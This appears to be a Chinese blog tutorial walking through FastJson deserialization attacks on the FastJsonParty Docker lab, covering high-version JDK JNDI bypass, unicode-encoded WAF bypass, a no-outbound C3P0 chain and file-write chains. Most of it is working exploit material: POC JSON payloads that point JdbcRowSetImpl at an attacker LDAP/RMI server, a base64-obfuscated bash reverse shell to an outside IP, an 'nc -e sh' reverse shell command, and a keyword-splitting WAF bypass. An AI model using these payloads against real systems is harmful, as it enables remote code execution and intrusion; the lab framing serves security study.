服务攻防-Java组件安全&FastJson&高版本JNDI&不出网C3P0&编码绕WAF&写入文件CI链

知识点:

服务攻防-Java组件-FastJson&JDK&高版本&不出网&WAF

演示环境:
https://github.com/lemono0/FastJsonParty

FastJson全版本Docker漏洞环境(涵盖1.2.47/1.2.68/1.2.80等版本),主要包括JNDI注入及高版本绕过、waf绕过、文件读写、原生反序列化、利用链探测绕过、不出网利用等。从黑盒的角度覆盖FastJson深入利用.

演示案例-服务攻防-Java组件-FastJson&JDK&高版本&不出网&WAF

一、FastJson-JDK高版本绕过(1245-jdk8u342)



1、插件判断出FastJson及版本特征

工具插件:https://github.com/Niiiiko/FastjsonScan4Burp



知道fastjson版本后,就可以尝试用对应版本的POC去攻击。

bash 复制代码
1.2.47版本的POC
{
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://101.32.220.14:1389/AoKhk",
        "autoCommit": true
    }
}





2、利用JNDI注入未成功转高版本绕过利用

项目地址:https://github.com/B4aron1/JNDIBypass

bash 复制代码
java -jar JNDIBypass.jar -a 0.0.0.0 -p 1389 -c "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzIuMjIwLjE0Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}"

3、监听反弹

bash 复制代码
nc -lvvp 9999

二、FastJson-编码特性WAF绕过(1247-jndi-waf)

bash 复制代码
修改docker-compose.yml(user: root)



漏洞点也一样,也是从登录模块发现json数据包。

1、插件判断出FastJson及版本特征

https://github.com/Niiiiko/FastjsonScan4Burp


Fastjson本身是默认识别并解码hexunicode编码的,可以利用这个特性绕过。

2、利用JNDI注入未成功转编码绕过利用

bash 复制代码
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc 101.32.220.14 9999 -e sh" -A 101.32.220.14
bash 复制代码
原始POC

{
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://101.32.220.14:1389/cEsHj",
        "autoCommit": "true"
    }
}
bash 复制代码
绕过POC

{
    "a":{
        "\u0040\u0074\u0079\u0070\u0065":"\u006A\u0061\u0076\u0061\u002E\u006C\u0061\u006E\u0067\u002E\u0043\u006C\u0061\u0073\u0073",
        "\u0076\u0061\u006C":"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u0074\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u0070\u006C"
    },
    "b":{
        "\u0040\u0074\u0079\u0070\u0065":"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u0074\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u0070\u006C",
        "\u0064\u0061\u0074\u0061\u0053\u006F\u0075\u0072\u0063\u0065\u004E\u0061\u006D\u0065":"\u0072\u006D\u0069\u003A\u002F\u002F\u0031\u0030\u0031\u002E\u0033\u0032\u002E\u0032\u0032\u0030\u002E\u0031\u0034\u003A\u0031\u0030\u0039\u0039\u002F\u007A\u0039\u0069\u0035\u0074\u0074",
        "\u0061\u0075\u0074\u006F\u0043\u006F\u006D\u006D\u0069\u0074":"\u0074\u0072\u0075\u0065"
    }
}


3、监听反弹

bash 复制代码
nc -lvvp 9999

三、FastJson-WAF加不出网C3P0利用(1247-waf-c3p0)

bash 复制代码
修改docker-compose.yml(删除internal: true)

1、插件判断出FastJson及版本特征

https://github.com/Niiiiko/FastjsonScan4Burp



2、不出网C3P0链构造利用

见官方WP部分

3、WAF绕过

bash 复制代码
添加`_`或`+`处理关键字绕过
userOverridesAsString->us_erOverridesAsString

参考文章:https://y4tacker.github.io/2022/03/30/year/2022/3/浅谈Fastjson绕waf/


四、FastJson-高版本加写入链利用(1268-writefile-jsp)

1、插件判断出FastJson及版本特征

https://github.com/Niiiiko/FastjsonScan4Burp


2、高版本采用写入链

先探针到中间件及目录,利用链加写入文件内容,参考官方WP过程。

利用POChttps://github.com/kezibei/fastjson_payload(该项目是针对不同环境的)




相关推荐
大圣编程18 小时前
Java 多维数组详解
java·开发语言
ylscode20 小时前
OpenSSH 10.4 正式发布:后量子加密落地,多项高危漏洞得到修复
网络·安全·网络安全
万法若空21 小时前
【算法-查找】查找算法
java·数据结构·算法
DianSan_ERP21 小时前
电商架构演进:如何在高并发场景下实现多平台API的标准化履约?
运维·前端·网络·安全·架构·自动化
搭贝1 天前
低代码平台构建EHS环境健康安全管理系统:从隐患排查到合规审计的全流程实操指南
安全·低代码
HZZD_HZZD1 天前
DL/T 645-2026新国标深度解读与智能电表协议适配实战:从帧结构变化到Java采集器升级的全链路改造方案
java·开发语言
山登绝顶我为峰 3(^v^)31 天前
C/C++ 交叉编译方法
java·c语言·c++
一叶飘零_sweeeet1 天前
Codex 与 Claude Code 深度拆解:两代 AI 编程智能体的技术本质与 Java 实战指南
java·ai·codex·claude code
Listen·Rain1 天前
提示词和提示词模板
java·人工智能·spring boot